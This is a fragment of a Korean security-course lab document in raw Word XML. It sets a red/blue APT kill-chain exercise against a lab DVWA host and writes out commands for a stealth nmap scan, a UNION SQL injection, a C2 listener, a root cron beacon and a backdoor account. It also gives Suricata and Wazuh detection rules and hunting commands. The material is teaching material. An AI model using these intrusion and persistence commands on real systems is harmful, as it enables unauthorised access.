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W1] APT 킬체인 — 정찰→침투→발판→C2 전 단계 시뮬레이션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1주차 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>APT 킬체인</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>. 한 번의 익스플로잇이 아니라 정찰 → 침투 → 발판 → 지속성 → C2/유출로</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">이어지는 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>전 단계 캠페인</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>을 직접 수행한다. Red(공격) 학생은 킬체인을 실행하고, Blue(방어) 학생은 각 단계를</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>탐지·재구성한다.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스텔스 정찰로 표면을 훑고, 태그 단 익스플로잇으로 침투하고, 리버스 셸 C2 와 cron 비콘으로 지속성을</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>확보한다. 방어자는 각 단계를 탐지 룰로 잡고 ATT&amp;CK 킬체인으로 재구성한다.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공격(자기 인프라 표적)과 방어를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킬체인을 실행,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`aa01r1-&lt;본인id&gt;`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, C2 포트 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>55001</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, cron 비콘 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>`/etc/cron.d/aa01beacon`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aa01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`atka01`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, Suricata 탐지 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>sid 9701011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103011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[정찰 → 침투] — 스텔스 정찰 후 태그 단 익스플로잇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킬체인 1·2단계다. 먼저 IDS 회피형 스텔스 정찰로 표면을 파악하고(개념: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>nmap -sS -T2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, NSE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>vuln</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>), 이어서</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">대상 웹앱을 익스플로잇한다. 귀속을 위해 익스플로잇에 태그 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>aa01r1-&lt;본인id&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 를 단다.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# 1) 스텔스 정찰 (느린 타이밍으로 IDS 회피 시도)</w:t>
        <w:br/>
        <w:t>nmap -sS -T2 -Pn -p 80,443 192.168.0.161          # (참고용 — 외부에서)</w:t>
        <w:br/>
        <w:t># 2) 태그 단 침투 (UNION SQLi)</w:t>
        <w:br/>
        <w:t>curl -s -A "aa01r1-kim-apt" -H "Host: dvwa.6v6.lab" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "http://192.168.0.161/vulnerabilities/sqli/?id=aa01r1-kim%27%20UNION%20SELECT%20user,password%20FROM%20users--+&amp;Submit=Submit"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aa01r1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 가 포함된 침투 탐지(913 스캐너/942 SQLi)가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aa01r1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 태그가 포함된 침투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[발판 → 지속성/C2] — 리버스 셸 + cron 비콘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킬체인 3·4단계다. 침투 후 리버스 셸 C2 채널(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>포트 55001</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>)을 열고, cron 비콘(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>`/etc/cron.d/aa01beacon`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>백도어 계정(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>`atka01`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>)으로 지속성을 확보한다.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55001 &gt;/dev/null 2&gt;&amp;1 &amp;     # C2 리스너 (또는 nc/python)</w:t>
        <w:br/>
        <w:t>echo '*/5 * * * * root /bin/bash -c "id # aa01 beacon" &gt;/dev/null 2&gt;&amp;1' | sudo tee /etc/cron.d/aa01beacon</w:t>
        <w:br/>
        <w:t>sudo useradd -m -s /bin/bash atka01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55001 listening 이거나 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/etc/cron.d/aa01beacon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aa01</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>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55001 listening 또는 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/etc/cron.d/aa01beacon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aa01</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>) 존재.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[침투 단계 탐지] — Suricata 룰 (sid 9701011)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킬체인의 침투(웹공격) 단계를 잡는 Suricata 룰(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>sid 9701011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(msg:"ATKADV-W01 APT initial access SQLi"; flow:to_server; http.uri; content:"UNION"; nocase; content:"SELECT"; nocase; sid:9701011;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9701011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침투 단계를 보는 sid 9701011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[지속성/C2 탐지] — Wazuh 룰 (id 103011)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지속성(cron)·C2 단계를 잡는 Wazuh 룰(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>id 103011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name="edu,apt,"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;rule id="103011" level="13"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;if_group&gt;edu&lt;/if_group&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;match&gt;cron.d&lt;/match&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;description&gt;ATKADV-W01 - APT persistence (cron beacon) detected&lt;/description&gt;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/etc/cron.d/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 를 syscheck FIM 대상으로 두면 cron 비콘 설치가 잡힌다.)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지속성/C2 를 보는 id 103011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[킬체인 재구성] — ATT&amp;CK 매핑 + 헌팅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흩어진 탐지를 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>하나의 APT 캠페인</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>으로 재구성한다. 각 경보를 ATT&amp;CK 킬체인 단계(Recon→Initial Access→</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Execution→Persistence→C2)로 매핑하고, 호스트에서 발판(포트 55001/cron/계정 atka01)을 헌팅한다.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ATT&amp;CK 킬체인 단계별 매핑(이번 룰 9701011/103011 포함)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헌팅 결과: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ss -tlnp | grep 55001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cat /etc/cron.d/aa01beacon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getent passwd | grep atka01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킬체인 재구성/헌팅으로 채점.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; 참고: 실재 증거(Suricata IDS rule </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>86601</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 등)를 인용하면 점수가 오른다.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ATT&amp;CK 킬체인 재구성·헌팅은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